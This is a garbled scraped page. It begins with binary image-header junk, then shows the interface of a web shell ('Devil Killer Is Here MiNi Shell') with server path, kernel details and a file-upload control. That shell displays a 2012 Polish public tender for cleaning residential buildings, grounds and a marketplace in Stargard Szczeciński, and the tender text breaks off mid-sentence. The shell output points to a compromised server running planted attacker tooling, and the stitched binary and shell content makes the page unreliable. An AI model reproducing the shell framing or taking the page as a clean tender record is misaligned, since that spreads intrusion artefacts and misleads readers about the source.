JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120330/101030-N-2012.html

<p class="kh_header"><b>Stargard Szczeciński: Sprzątanie wewnątrz 42 budynków mieszkalnych  powierzchni 9 308 m2 ,utrzymanie w czystości przylegających do 42 budynków terenów zewnętrznych o powierzchni 18 926 m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 16 474 m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o. o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 zgodnie z załączonym wykazem adresowym zał. 6, 6a, 6b</b><br>
<b>Numer ogłoszenia: 101030 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.z o.o. , ul. A. Struga 29, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784750, faks 091 577 15 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa osoba prawna -spółka prawa handlowego gminy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie wewnątrz 42 budynków mieszkalnych  powierzchni 9 308 m2 ,utrzymanie w czystości przylegających do 42 budynków terenów zewnętrznych o powierzchni 18 926 m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 16 474 m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o. o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 zgodnie z załączonym wykazem adresowym zał. 6, 6a, 6b.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie wewnątrz 42 budynków mieszkalnych  powierzchni 9 308 m2 ,utrzymanie w czystości przylegających do 42 budynków terenów zewnętrznych o powierzchni 18 926 m2  oraz utrzymanie w czystości innych terenów ogólnodostępnych o powierzchni 16 474 m2 przy obiektach administrowanych przez Stargardzkie  Towarzystwo Budownictwa Społecznego Spółka z o. o, na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3543 m2 wraz z pawilonem socjalnym o powierzchni 40 m2 zgodnie z załączonym wykazem adresowym zał. 6, 6a, 6b
Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i  czystości  wewnątrz  budynku  dotyczy ZADANIA NR  1  :
1.	Częstotliwość i zakres świadczonych usług:
-codziennie -sprzątanie pomieszczeń klatki schodowej, korytarzy,
-dwa razy w miesiącu- sprzątanie schodów i korytarzy piwnicznych, oraz pomieszczeń wspólnego użytku tj. pralni, suszarni
-raz w miesiącu- mycie wodą  ze środkami myjącymi np.: proszkiem, mydłem podestów, biegów, poręczy , klatek schodowych, sieni, korytarzy
-raz w kwartale- sprzątanie strychów, oraz oczyszczanie studzienki wodomierzowej w budynku i poza budynkiem
-dwa razy w roku - na wiosnę przed Świętami Wielkanocnymi i jesienią na przełomie  października i listopada mycie  środkami do tego przeznaczonymi okien i drzwi, lamperii na klatce schodowej,  mycie szyb, kloszy oświetlenia na klatce schodowej, korytarzach i pomieszczeniach wspólnego użytku 
2.	Przez sprzątanie strony rozumieją zamiatanie, zbieranie śmieci,  usuwanie pajęczyn i kurzu oraz wykonywanie innych czynności związanych z utrzymaniem czystości w budynkach
3.	Sprzątanie i mycie w  budynku ma się odbywać w czasie najmniej uciążliwym dla mieszkańców domu, a czynności codziennego sprzątania  powinny zostać zakończone do godz. 13°°.
4.	Sprzątanie wykonuje się  w dni robocze, jeżeli liczba dni wolnych od pracy następujących po sobie wynosi więcej niż dwa, Wykonawca obowiązany jest posprzątać, zlecone  tereny wewnętrzne i zewnętrzne co najmniej w jednym dniu wolnym od pracy.
Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości wokół budynku i na zieleńcach przydomowych oraz na dojściach, chodnikach ( dotyczy ZADANIA NR 1 ):
1.	Częstotliwość i zakres świadczonych usług:
-Codziennie:
sprzątanie podwórzy, parkingu, osłon  śmietnikowych , dróg  wewnętrznych   i innych miejsc gromadzenia nieczystości,
w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
likwidacja   gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
raz w tygodniu - w okresie od 1 kwietnia do 31 października oraz raz w miesiącu- w okresie od  01 listopada do 31 marca w dniach wywozu nieczystości stałych, dezynfekcja opróżnionych pojemników    na nieczystości i osłon śmietnikowych środkiem dezynfekującym np. Podchloryn Sodowy, Śmieciotox, Vigonez lub innymi podobnymi. Wykonawca zobowiązany jest kontrolować stan pojemników na nieczystości, informować Zamawiającego na bieżąco o  zauważonych brakach lub uszkodzeniach pojemników oraz o potrzebie ich wymiany lub uzupełnienia
2.	Sprzątanie dojść do osłon śmietnikowych, chodników, parkingów  w  okresie zimowym ponadto systematyczne usuwanie z dojść, parkingów i chodników śniegu, błota i lodu, zwalczanie śliskości i gołoledzi.
3.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, parkingu, dróg wewnętrznych, posypywanie piaskiem, dezynfekcja opróżnionych pojemników na śmieci oraz wykonywanie innych czynności związanych z utrzymaniem czystości na terenach zewnętrznych zlokalizowanych budynkach
4.	Do obowiązków Wykonawcy należy dbałość o ład i porządek w osłonach śmietnikowych, przy pojemnikach na terenie i w ich otoczeniu. Wykonawca zobowiązany jest do usuwania zalegających nieczystości do pojemników. Wykonawca obowiązany jest informować Zamawiającego o zakłóceniach w wywozie nieczystości.
5.	Sprzątanie chodników latem Wykonawca powinien zakończyć do godz. 9.00,natomiast  zimowe   oczyszczanie ze śniegu, lodu i błota   nawierzchni chodników i dojść    do osłon śmietnikowych oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz.  7°° rano. Nie dotyczy to ciągłych opadów  śniegu i marznącej mżawki powodującej gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
       6.Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych  liści z obsługiwanych 
          zieleńców. Po zgrabieniu liści  worki z odpadami należy umieścić przy altanach śmietnikowych 
          oraz  niezwłocznie   powiadomić o tym fakcie Zamawiającego 
      7.Wykonawca zapewnia  we własnym zakresie odpowiednie materiały (np. środki
         czystości, worki , środki dezynfekujące ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem
         zamówienia.
8.Oprócz obsługi budynków i terenów polegającej na letnim i zimowym utrzymania porządku i czystości,
   do obowiązków Wykonawcy należy również:
informowanie Zamawiającego na piśmie o zauważonych uszkodzeniach elementów klatki schodowej lub elewacji,  pomieszczeń i urządzeń wspólnego użytku i udzielenie pomocy w ewentualnym wykryciu sprawców,
dekoracja flagami budynków z okazji świąt państwowych i lokalnych,
rozwieszanie  w budynkach   zawiadomień   i   informacji   urzędowych lokalnych dotyczących mieszkańców domu,
roznoszenie korespondencji dot. mieszkańców domu, aneksów, powiadomień o zmianie opłat,
Zadania i obowiązki Wykonawcy w zakresie letniego i zimowego utrzymania porządku i czystości
na terenach zewnętrznych ogólnodostępnych (dotyczy ZADANIA NR 1 ):
1.	Codziennie:
sprzątanie  całego zleconego obszaru 
sprzątanie chodników, parkingów, dojść ,a w okresie zimowym ponadto usuwanie z chodników  dojść, parkingu, śniegu, błota i lodu, 
w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z parkingów, chodników, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
likwidacja   gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
2.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, parkingu, dróg wewnętrznych, posypywanie piaskiem.
3.	Sprzątanie terenów latem Wykonawca powinien zakończyć do godz. 9.00,natomiast  zimowe   oczyszczanie ze śniegu, lodu i błota   nawierzchni chodników i różnego rodzaju dojść oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz.  7°° rano. Nie dotyczy to  ciągłych opadów  śniegu i marznącej mżawki powodującej gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
4.	Wykonawca zapewnia we własnym zakresie odpowiednie materiały (np.  worki  ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem zamówienia.
5.	Do obowiązków Wykonawcy  w okresie zimowym należy również oczyszczanie ze śniegu i błota wpustów ulicznych, zasuw wodnych i hydrantów pożarowych w sposób zapewniający swobodny spływ wody w czasie odwilży oraz w celu łatwego zlokalizowania tych urządzeń na wypadek awarii lub pożaru.
6.	Wykonawca jest zobowiązany do zgrabiania w miarę potrzeby opadłych liści z obsługiwanych zieleńców. Po zgrabieniu liści worki z odpadami należy umieścić w miejscu wskazanym przez Zamawiającego i   niezwłocznie powiadomić o tym fakcie Zamawiającego 
7.	Wykonawca zobowiązany jest dbać o ład i porządek w miejscach składowania nieczystości, na 
       terenie i w obrębie tych miejsc.

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i  czystości  wewnątrz  budynku  (dotyczy ZADANIA NR 2 za wyjątkiem budynku przy ul. Aleja Żołnierza 11a oraz budynku administracyjnego przy ul. W. Polskiego 47a)
1.	przez sprzątanie strony rozumieją zamiatanie, zbieranie śmieci, , usuwanie pajęczyn i kurzu i wykonywanie innych czynności związanych z utrzymaniem czystości w budynkach.
2.	codziennie -sprzątanie korytarzy, schodów, kl. schodowych, 
3.	dwa razy w miesiącu- sprzątanie schodów i korytarzy piwnicznych, suszarni, wózkarni
4.	dwa razy w miesiącu mycie wodą ze środkami myjącymi np. Sidolux, Ajax lub podobnymi ,podestów, poręczy,   drzwi klatek schodowych(wspólnego użytku), sieni,  korytarzy, schodów.  
5.	raz na kwartał- sprzątanie strychów
6.	dwa razy w roku- na wiosnę przed Świętami Wielkanocnymi i jesienią na przełomie  listopada i grudnia mycie środkami do tego przeznaczonymi lamperii, okien na klatkach schodowych, kloszy  oświetlenia na  klatkach schodowych, korytarzach i pomieszczeniach wspólnego użytku
7.	sprzątanie oraz mycie musi się odbywać w czasie najmniej uciążliwym dla mieszkańców domu, a czynności codziennego sprzątania powinny być zakończone do godz.13.00 natomiast sprzątanie  obowiązuje w dni robocze , jeżeli liczba dni wolnych od pracy następujących po sobie wynosi więcej niż  dwa , Wykonawca zobowiązany jest zleconą usługę wykonać co najmniej w jednym dniu wolnym od pracy.
Zadania i obowiązki  w zakresie utrzymania porządku i czystości terenów zewnętrznych na zieleńcach przydomowych , dojściach, chodnikach obejmują w szczególności codzienne ( dotyczy zadania nr 2):
1)	sprzątanie podwórzy, parkingów, osłon śmietnikowych, i innych miejsc gromadzenia  nieczystości
2)	zbieranie śmieci, papierków, zgrabiania w miarę potrzeby opadowych liści z obsługiwanych  zieleńców przydomowych .Po zgrabieniu liści należy worki z odpadami umieścić przy altanach śmietnikowych oraz  niezwłocznie   powiadomić Zamawiającego 
3)	sprzątanie placów zabaw: usuwanie śmieci, potłuczonego szkła , innych  przedmiotów zagrażającemu bezpieczeństwu użytkowników
4)	w warunkach letnich bieżące czyszczenie powierzchni utwardzonej wokół obiektów 
5)	systematyczne opróżnianie koszy na śmieci. Wykonawca zapewni worki do koszy na śmieci
6)	sprzątanie dojść do osłon śmietnikowych, chodników, parkingów  a w okresie zimowym ponadto usuwanie z dojść, parkingów  i chodników śniegu, błota i lodu, zwalczanie śliskości i gołoledzi poprzez posypanie piaskiem
7)	w razie wystąpienia opadów ciągłych śniegu powinien być usuwany systematycznie w odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a  po ustaniu opadów śniegu powinien być usunięty z powierzchni i spryzmowany przy krawędzi chodnika,
8)	jeżeli występuje  gołoledź Wykonawca obowiązany jest posypywać piaskiem lub innym materiałem szorstkim stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska 
9)	raz w tygodniu w okresie od 1 kwietnia do 31 października, raz w miesiącu  w okresie od 1 listopada do 31 marca w dniach wywozu  nieczystość   stałych - dezynfekcja opróżnionych pojemników na nieczystości osłon śmietnikowych  środkiem dezynfekującym np. Podchloryn Sodowy, Śmieciotox, Vigonez lub innymi podobnymi 
10)	likwidacja chwastów oraz traw znajdujących się na utwardzonej powierzchni chodników , parkingach dojściach, przy krawężnikach oraz   opaskach budynków
11)	ręczne odchwaszczanie terenów wokół  drzew krzewów wolnostojących oraz żywopłotów
12)	podlewanie trawników, a w okresach suszy również drzew, krzew i innych nasadzeń z częstotliwością zapewniającą ich właściwe utrzymanie i w sposób zapobiegający ich schnięciu. Powyższe czynności należy wykonywać przy użyciu sprzętu dostarczonego przez Zamawiającego i z ujęć poboru wody wskazanych przez Zamawiającego 
13)	sprzątanie latem chodników i parkingów  Wykonawca powinien zakończyć do godz. 9.00 natomiast zimowe oczyszczanie ze śniegu , lodu i błota nawierzchni chodników , parkingów i dojść do osłon śmietnikowych oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz. 7.00 rano-nie dotyczy opadów ciągłych śniegu i marznącej mżawki powodując gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi
14)	zgłaszanie na bieżąco  o zauważonych brakach lub uszkodzeniach pojemników w poszczególnych posesjach oraz o potrzebie ich wymiany lub uzupełnienia.
15)	do obowiązków Wykonawcy należy dbałość o ład i porządek w osłonach śmietnikowych i w ich otoczeniu Wykonawca zobowiązany jest do usuwania zalegających nieczystości do pojemników. Wykonawca obowiązany jest informować Zamawiającego o zakłóceniach w wywozie nieczystości.
16)	wykonawca zapewnia na własny koszt i we własnym zakresie odpowiednie materiały (np. środki czystości, worki, środki dezynfekujące ) oraz narzędzia do wykonywania prac zgodnie z przedmiotem zamówienia.
17)	oprócz obsługi budynków i terenów polegających na letnim i zimowym utrzymaniu  porządku  i czystości do obowiązków Wykonawcy należy również: 
informowanie Zamawiającego na piśmie o zauważonych uszkodzeniach elementów klatki schodowej lub elewacji pomieszczeń i urządzeń wspólnego użytku i pomocy w  wykryciu sprawców
dekoracja flagami budynków z okazji świąt państwowych i lokalnych
rozwieszanie w budynkach zawiadomień i informacji urzędowych lokalnych dotyczących mieszkańców domu
roznoszenie korespondencji dot. mieszkańców domów: aneksy -powiadomienia o zmianie opłat, roczne rozliczenie wody.
Zadania i obowiązki  w zakresie utrzymania porządku i czystości terenów zewnętrznych obejmują w szczególności codzienne ( dotyczy ZADANIA NR 2 patio)
1.	W warunkach letnich zbieranie papierków, śmieci, bieżące oczyszczanie powierzchni utwardzonej,   oraz nawierzchni na placu zabaw.
2.	Systematyczna likwidacja chwastów oraz traw znajdujących się  na utwardzonej powierzchni chodników oraz na placu zabaw.
3.	Systematyczne opróżnianie koszy na śmieci.
4.	Usuwanie w okresie zimowym z dojść, chodników, śniegu, błota i lodu, zwalczanie śliskości i gołoledzi poprzez posypywanie piaskiem.
5.	W razie wystąpienia opadów ciągłych śniegu powinien być usuwany systematycznie w odstępach czasu gwarantujących w miarę swobodne korzystanie z przejść, a  po ustaniu opadów śniegu powinien być usunięty z powierzchni i spryzmowany. Jeżeli występuje gołoledź Wykonawca obowiązany jest posypywać piaskiem lub innym materiałem szorstkim stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska. 
6.	Sprzątanie chodników, dojść (patio) latem Wykonawca powinien 
zakończyć do godz. 9.00 natomiast zimowe oczyszczanie ze śniegu , lodu i błota nawierzchni chodników i dojść oraz zapobieganie śliskości Wykonawca obowiązany jest zakończyć do godz. 700 rano-nie dotyczy opadów ciągłych śniegu i marznącej mżawki powodując gołoledź kiedy obowiązuje zasada stałej i bieżącej obsługi.
7.	Wykonawca zapewnia na własny koszt i we własnym zakresie odpowiednich materiałów (np. środków czystości, worków) oraz narzędzi do wykonywania prac .

Zadania i obowiązki Wykonawcy w zakresie utrzymania porządku i czystości na terenie Targowiska przy ul. Reja -Słowackiego o powierzchni 3 543 m2 (dotyczy ZADANIA NR 3):
1.	Codzienne łącznie z sobotami i  niedzielami:
sprzątanie  ,w okresie letnim tj. od 01 kwietnia  do 30 września, przed rozpoczęciem handlu od godz.5.00 oraz  po zakończeniu handlu po godz. 18.00, w okresie zimowym tj od 01 października do 31 marca,  przed rozpoczęciem handlu od godz.6.00 oraz po zakończeniu handlu po godz. 16,  terenu targowiska polegające na zamiataniu śmieci, papierów, zmiotek i innych zanieczyszczeń zalegających na placu.
mycie stołów - straganów.
sprzątanie części chodnika wzdłuż placu targowego od strony ul. Słowackiego  ,a w okresie zimowym ponadto usuwanie z chodnika śniegu, błota i lodu, 
zanieczyszczenia należy umieszczać w ustawionych na terenie targowiska pojemnikach, a w okresie od piątku do niedzieli z powodu zwiększonego natężenia handlu, również w dodatkowo ustawionych , zamkniętych wózkach. Wykonawca zobowiązany jest do wystawienia dodatkowych wózków w każdy piątek , a po ich opróżnieniu w poniedziałek do ich schowania do wyznaczonego, zamkniętego pomieszczenia. 
w razie wystąpienia ciągłych opadów śniegu systematyczne jego usuwanie w   odstępach czasu gwarantujących w miarę swobodne korzystanie z chodników i przejść, a po ustaniu opadów  usunięcie śniegu  z chodnika, dróg wewnętrznych, dojść i spryzmowanie  przy krawędzi chodnika
likwidacja gołoledzi i śliskości pośniegowej  z zastosowaniem środków stosownie do postanowień Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków , jakie mogą być używane na drogach publicznych, ulicach i placach (Dz. U. z 2005 r nr 230 poz. 1960). Likwidacja gołoledzi i śliskości pośniegowej powinna odbywać się stale w miarę potrzeby i w takich odstępach czasu aby oblodzona nawierzchnia nie była śliska.
sprzątanie  w pawilonie socjalnym obejmuje:
a)	mycie podłóg, czyszczenie i odkurzanie  powierzchni mebli i wyposażenia w pomieszczeniu biurowym
b)	mycie podłóg, glazury, drzwi, ścian, luster, urządzeń i armatury sanitarnej oraz opróżnianie koszy w dwóch pomieszczeniach w-c 
sprzątanie pomieszczenia socjalnego i pomieszczenia na pojemniki w pawilonie socjalnym.
2.	Dwa razy w roku tj przed Świętami Bożego Narodzenia i Wielkanocnymi  mycie okien w pawilonie socjalnym,
3.	Raz w tygodniu mycie ścian i drzwi w pawilonie socjalnym.

4.	Przez sprzątanie strony rozumieją usuwanie zanieczyszczeń , o których mowa w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz.U z 2005 r nr 236 poz.2008 z późn. zm.) znajdujących się na terenach objętych przedmiotowym zamówieniem. Zanieczyszczeniami są w szczególności : błoto, piasek, kamienie, muł, żwir, niedopałki papierosów, połamane gałęzie, liście, zwierzęce odchody ,wszelkiego rodzaju opakowania, papier, szkło, butelki, worki, folie, resztki pokarmów, oraz inne zanieczyszczenia wynikające z ruchu pieszego. Sprzątanie ponadto obejmuje usuwanie śniegu z przejść, chodników, dróg wewnętrznych, posypywanie piaskiem, dezynfekcja opróżnionych pojemników na śmieci oraz wykonywanie innych czynności związanych z utrzymaniem czystości na terenie targowiska
5.	Przeprowadzanie dezynfekcji opróżnionych pojemników na nieczystości przy pomocy środków dezynfekcyjnych w miarę potrzeby w dniach wywozu nieczystości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>obejmuje 50% zamówienia podstawowego , przedmiotem zamówienia uzupełniającego jest powtórzenie tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.60.00.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca  zobowiązany jest wnieść wadium w wysokości :
 ZADANIE NR 1 - 4 800,00zł
 ZADANIE NR 2  -1 600,00zł
 ZADANIE NR 3 -1 400,00zł
      W jednej lub kilku następujących formach:
Gwarancjach bankowych lub ubezpieczeniowych,
Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,
Poręczeniach udzielanych przez podmioty, o których mowa w art. 45 ust.6 pkt 5 Pzp
Pieniądzu
Wadium w poręczeniach lub gwarancjach musi obejmować okres  związania ofertą
Gwarancje lub poręczenia w formie oryginału należy załączyć do oferty.
Gwarancje i poręczenia winny zawierać określenie przetargu ,jego nazwę, nazwę wykonawcy, zamawiającego, wysokość gwarantowanej lub poręczanej kwoty wadium, termin ważności nie krótszy niż okres związania ofertą oraz zobowiązanie gwaranta lub poręczyciela do bezwarunkowej i nieodwołalnej zapłaty należności, na pierwsze żądanie zamawiającego, w przypadkach  utraty wadium określonych w art. 46 ust.4a i 5 ustawy Pzp oraz wyszczególniać  poniższe okoliczności w jakich zamawiający może zatrzymać wadium wraz z odsetkami:
